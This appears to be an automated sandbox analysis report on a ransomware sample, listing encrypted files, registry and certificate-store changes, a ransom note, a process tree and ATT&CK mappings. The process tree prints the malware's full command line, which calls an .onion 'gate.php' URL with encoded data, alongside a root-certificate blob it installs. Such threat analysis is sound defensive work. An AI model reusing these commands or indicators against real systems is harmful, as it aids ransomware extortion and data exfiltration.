File created	\??\c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\fss\js\faf-main.js.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\BackFiles_encoded01.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.skypeapp_11.8.204.0_x64__kzf8qxf38zg5c\skypeapp\designs\flags\small\sj_16x11.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\hxmailapplist.targetsize-40_altform-unplated.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files (x86)\common files\microsoft shared\stationery\softblue.jpg	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\microsoft office\root\licenses16\visiostdvl_kms_client-ppd.xrm-ms.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\grphflt\gifimp32.flt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\on-boarding\images\themeless\pt-br_get.svg	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
4252	NOTEPAD.EXE
5044	notepad.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4080	tor.exe
4080	tor.exe
4080	tor.exe
4080	tor.exe
4080	tor.exe
4080	tor.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 396 wrote to memory of 5044	396	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe	74
PID 396 wrote to memory of 5044	396	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe	74
PID 396 wrote to memory of 5044	396	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe	74
PID 396 wrote to memory of 2116	396	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe	76
PID 396 wrote to memory of 2116	396	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe	76
PID 396 wrote to memory of 2116	396	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe	76
PID 2116 wrote to memory of 4080	2116	firefox.exe	78
PID 2116 wrote to memory of 4080	2116	firefox.exe	78
PID 2116 wrote to memory of 4080	2116	firefox.exe	78
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 4520	2116	firefox.exe	81
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82
PID 2116 wrote to memory of 3644	2116	firefox.exe	82

C:\Users\Admin\AppData\Local\Temp\jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
"C:\Users\Admin\AppData\Local\Temp\jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:396
- C:\Windows\SysWOW64\notepad.exe
  "notepad.exe" C:\Users\Admin\Desktop\BackFiles_encoded01.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:5044
- C:\Users\Admin\Desktop\browser\firefox.exe
  "C:\Users\Admin\Desktop\browser\firefox.exe" --allow-remote http://chat5sqrnzqewampznybomgn4hf2m53tybkarxk4sfaktwt7oqpkcvyd.onion/gate.php?data=mMuO7yV2SabitZONNkW5UPOl5NlDMwuw%2BIWgw1YloCHRm7PeEEJnkNObpLwYcIh2%2FbO2mQobKcyKiLL2EnGIY6W%2F341WGA7V1vP%2B438O9GOs55a%2FExwrnobn%2FetHK8FO1PG9z11AfYbK9%2BbkWiGDaajx6cVcBCiDyNn761oizze2%2FaiJTBJ09dLF1%2BZGKfwbwLGc1TFXf7P6hfLpACGyRvOH%2F7sARA%2FntcDe1UUW2ir1loOJHDt5lMLR%2B%2Bs2IYZA4KfHpHURf%2B6J%2FMHJAzCBJ62ioI84Rie5%2FoHY91VFh2%2Frku%2B3RjwOkdTN6%2BZCDOoU9JXuhF9AD7b06P%2FgK12Fftf%2F%2FdhjIB7epNGg9XsLjSjN9YiZLSckmp6C0sA1fac0wZK7jUggLIPQ99vLZgfDH%2BO775kuOTuw7YTloFVRlGH8mMueHE5w0ImM9stsCtI63feOmBwXeZ7Y%2B%2B7xDGHSfvW6%2FblqLnDCieziz0Qf%2B2bb%2BK25GSgiw56C1v8ka9lf7oDCgHMmbJSghtnYbhT6Jsq5oJ4zCCCkzub3wBR0hm7AgceCV1N74IuB3N1uD4oB8YiA2k4EH7DM18PsDSWGQ%2Bu4uo59BHHSg9br%2FBN3%2Fxz5j%2BylOScUm%2FjK0LYpeJAiqo2r3Wc9AeuogcXhQ3yPCuCnrp0VOjuF7Pf9sxRJgnHNu6vdZxMm743lys4Od%2FEFqJTslRUILpeegtbWM0C0bamCyahjRznk1vnSyQ9yzWXYiJvYTwYZve7K0fQNNtNBqqb3tk0DcJ%2FV1%2BPCBnfrE%2FCkkN4iFQW%2BjJWmwz5bhmv9kbnYaz8GyqP62fpGEIl1qIOYmEM%2BA7XM2v7wDlC5UNSx94JLPSrxrdnlvwQx4BzVtYjJSDQVmNnypPwpNtNBq57ArQBED%2FOk1MnFBnzeHKukjN4jSxm17PzF4SJD0E%2Bt8tTWXyJ7xKjjx%2BoDL5xi2KTvyUg0Gr2DwObGKUGvTtnuvKl8MQvLjOXq63kxyjv3sI2JTRM8hN%2F2rNUrW6giqonYhlFGG5bQz6G8RA6NB%2F6Dv6k%2FPCeCweDG0ShFs06rh9uhdgZ59Kjz5OcEd%2F8R3qazqjEwBbrf%2BOPzNVu4NvSx6o5mIyXnuM2gvn83yxLrqvzePEd0tcHUxOwfNtNF3r63lnUyD5e0xsS8WT37PtDxipo4BSDB%2FpWmxx9QlEbWvPa9VwQC0ojh6cZFF8gqooiPjQkQfJ%2FX%2FuzwAFnZUr34yg%3D%3D
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Users\Admin\Desktop\browser\TorBrowser\Tor\tor.exe
    "C:\Users\Admin\Desktop\browser\TorBrowser\Tor\tor.exe" --defaults-torrc C:\Users\Admin\Desktop\browser\TorBrowser\Data\Tor\torrc-defaults -f C:\Users\Admin\Desktop\browser\TorBrowser\Data\Tor\torrc DataDirectory C:\Users\Admin\Desktop\browser\TorBrowser\Data\Tor GeoIPFile C:\Users\Admin\Desktop\browser\TorBrowser\Data\Tor\geoip GeoIPv6File C:\Users\Admin\Desktop\browser\TorBrowser\Data\Tor\geoip6 HashedControlPassword 16:d19d18e4d27836e9608bf684c8b043ab75abc23854a3fc0b6b3391a336 +__ControlPort 9151 +__SocksPort "127.0.0.1:9150 IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 2116 DisableNetwork 1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:4080
- - C:\Users\Admin\Desktop\browser\firefox.exe
    "C:\Users\Admin\Desktop\browser\firefox.exe" -contentproc --channel="2116.0.627203460\838123476" -childID 1 -isForBrowser -boolPrefs 299:0| -schedulerPrefs 0001,2 -greomni "C:\Users\Admin\Desktop\browser\omni.ja" -appomni "C:\Users\Admin\Desktop\browser\browser\omni.ja" -appdir "C:\Users\Admin\Desktop\browser\browser" 2116 tab
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4520
- - C:\Users\Admin\Desktop\browser\firefox.exe
    "C:\Users\Admin\Desktop\browser\firefox.exe" -contentproc --channel="2116.6.433665060\1608908876" -childID 2 -isForBrowser -boolPrefs 299:0| -schedulerPrefs 0001,2 -greomni "C:\Users\Admin\Desktop\browser\omni.ja" -appomni "C:\Users\Admin\Desktop\browser\browser\omni.ja" -appdir "C:\Users\Admin\Desktop\browser\browser" 2116 tab
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3644

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\BackFiles_encoded01.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4252

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/396-118-0x00000000011F0000-0x000000000129E000-memory.dmp

Filesize
696KB

Download
memory/2116-153-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-167-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-185-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-186-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-187-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-189-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-190-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-191-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-188-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-192-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-193-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-194-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-195-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-196-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-197-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-198-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-199-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-200-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-201-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-202-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-203-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-204-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-205-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-183-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-182-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-181-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-180-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-178-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-179-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-177-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-176-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-174-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-175-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-172-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-173-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-171-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-170-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-169-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-168-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-184-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-166-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-165-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-164-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-163-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-162-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-161-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-160-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-159-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-158-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-157-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-156-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-155-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-154-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-152-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-151-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-150-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-149-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-147-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-148-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-128-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/2116-129-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/2116-144-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-145-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/2116-146-0x000000000C7F0000-0x000000000C800000-memory.dmp

Filesize
64KB

Download
memory/4080-320-0x0000000070B20000-0x0000000070BC7000-memory.dmp

Filesize
668KB

Download
memory/4080-318-0x0000000070BD0000-0x0000000070DD9000-memory.dmp

Filesize
2.0MB

Download
memory/4080-316-0x0000000070EF0000-0x0000000070F11000-memory.dmp

Filesize
132KB

Download
memory/4080-323-0x0000000000D00000-0x000000000109C000-memory.dmp

Filesize
3.6MB

Download
memory/4080-321-0x0000000070E30000-0x0000000070EED000-memory.dmp

Filesize
756KB

Download
memory/4520-480-0x0000000000460000-0x0000000000470000-memory.dmp

Filesize
64KB

Download
memory/4520-515-0x0000000000460000-0x0000000000470000-memory.dmp

Filesize
64KB

Download
memory/4520-519-0x0000000000460000-0x0000000000470000-memory.dmp

Filesize
64KB

Download
memory/4520-522-0x0000000000460000-0x0000000000470000-memory.dmp

Filesize
64KB

Download